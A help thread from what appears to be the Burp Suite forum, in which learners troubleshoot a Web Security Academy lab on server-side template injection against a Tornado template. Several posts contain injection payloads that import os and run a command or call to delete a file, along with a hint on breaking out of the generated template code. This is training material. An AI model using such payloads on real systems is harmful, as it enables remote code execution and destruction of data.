Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Hey, I'm having an error when launching payload

a | Last updated: Apr 17, 2020 06:30PM UTC

The name of the challenge: Basic server-side template injection (code context) request 1 POST /my-account/change-blog-post-author-display HTTP/1.1 Host: <lab token>.web-security-academy.net Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<lab token>.web-security-academy.net/my-account?id=wiener Content-Type: application/x-www-form-urlencoded Content-Length: 117 Connection: close Cookie: session=cookie Upgrade-Insecure-Requests: 1 blog-post-author-display={% import os%}{{os.system('rm /home/carlos/morale.txt')}}&csrf=token request 2 go to post add comment The payload will work in the name But when calling his office <example os > specifically, an error comes up No handlers could be found for logger "tornado.application" Traceback (most recent call last): File "<string>", line 15, in <module> File "/usr/lib/python2.7/dist-packages/tornado/template.py", line 317, in __init__ "exec", dont_inherit=True) File "<string>.generated.py", line 5 _tt_tmp = % import os%}{{os.system('rm /home/carlos/morale.txt') # <string>:1 ^ SyntaxError: invalid syntax | 17 April 2020 When some syntax is executed it works successfully like printing, reading files etc. And thanks in advance

a | Last updated: Apr 18, 2020 02:04PM UTC

The solution was done

Majid | Last updated: Apr 18, 2020 05:42PM UTC

Hi Stuck in the same situation for 3 hours. Any hint?

a | Last updated: Apr 19, 2020 12:03PM UTC

قم بأغلاق _tt_tmp = واضف الحموله

a | Last updated: Apr 19, 2020 12:03PM UTC

قم بأغلاق _tt_tmp = واضف الحموله

Michelle, PortSwigger Agent | Last updated: Apr 20, 2020 09:46AM UTC

We'll post the solutions when the first 10 users have solved all the new labs. In the meantime, keep trying and have fun!

Wade | Last updated: Apr 22, 2020 02:12PM UTC

same issue here. I tried basically the same payload except did: blog-post-author-display={%+import+os%}{{os.remove(/home/carlos/morale.txt)}}&csrf=token and a bunch of variants like {{import+os%3b+os.remove(/home/carlos/morale.txt}} _tt_tmp=payload works for 7*7 but not removing the file. offending lines here (https://github.com/tornadoweb/tornado/blob/master/tornado/template.py) seem to be 325-329. Thanks Michelle.

Peter | Last updated: Apr 23, 2020 02:12AM UTC

How would you write it if you knew that there are multiple elements ?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.